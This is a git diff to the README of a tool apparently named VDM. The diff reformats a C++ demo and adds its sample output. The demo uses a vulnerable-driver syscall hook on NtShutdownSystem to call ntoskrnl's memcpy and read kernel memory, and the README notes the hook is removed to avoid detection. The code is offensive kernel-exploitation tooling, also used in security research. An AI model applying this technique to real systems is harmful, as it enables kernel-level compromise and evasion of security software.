diff --git a/README.md b/README.md
index 7967ec2..2d684f7 100644
--- a/README.md
+++ b/README.md
@@ -14,26 +14,40 @@ but is removed after every syscall into NtShutdownSystem to prevent possible det
 In this example VDM syscalls into an inline hook placed on NtShutdownSystem to call memcpy exported from ntoskrnl.exe.
+#### Demo Code
 ```cpp
- vdm::vdm_ctx vdm;
- const auto ntoskrnl_base =
- reinterpret_cast(
- util::get_module_base("ntoskrnl.exe"));
-
- const auto ntoskrnl_memcpy =
- util::get_kernel_export("ntoskrnl.exe", "memcpy");
-
- std::printf("[+] drv_handle -> 0x%x, drv_key -> %s\n", drv_handle, drv_key.c_str());
- std::printf("[+] %s physical address -> 0x%p\n", vdm::syscall_hook.first, vdm::syscall_address.load());
- std::printf("[+] ntoskrnl base address -> 0x%p\n", ntoskrnl_base);
- std::printf("[+] ntoskrnl memcpy address -> 0x%p\n", ntoskrnl_memcpy);
-
- short mz_bytes = 0;
- vdm.syscall(ntoskrnl_memcpy, &mz_bytes, ntoskrnl_base, sizeof mz_bytes);
- std::printf("[+] kernel MZ -> 0x%x\n", mz_bytes);
+vdm::vdm_ctx vdm;
+const auto ntoskrnl_base =
+reinterpret_cast(
+ util::get_module_base("ntoskrnl.exe"));
+
+const auto ntoskrnl_memcpy =
+util::get_kernel_export("ntoskrnl.exe", "memcpy");
+
+std::printf("[+] drv_handle -> 0x%x, drv_key -> %s\n", drv_handle, drv_key.c_str());
+std::printf("[+] %s physical address -> 0x%p\n", vdm::syscall_hook.first, vdm::syscall_address.load());
+std::printf("[+] ntoskrnl base address -> 0x%p\n", ntoskrnl_base);
+std::printf("[+] ntoskrnl memcpy address -> 0x%p\n", ntoskrnl_memcpy);
+
+short mz_bytes = 0;
+vdm.syscall(
+ ntoskrnl_memcpy,
+ &mz_bytes,
+ ntoskrnl_base,
+ sizeof mz_bytes
+);
+std::printf("[+] kernel MZ -> 0x%x\n", mz_bytes);
 ```
-
+#### Demo Code Result
+```
+[+] drv_handle -> 0x70, drv_key -> frAQBc8Wsa1xVPfv
+[+] NtShutdownSystem physical address -> 0x00000000109BB3A0
+[+] ntoskrnl base address -> 0xFFFFF80075200000
+[+] ntoskrnl memcpy address -> 0xFFFFF800755F0980
+[+] kernel MZ -> 0x5a4d
+[+] press any key to close...
+```
 # Usage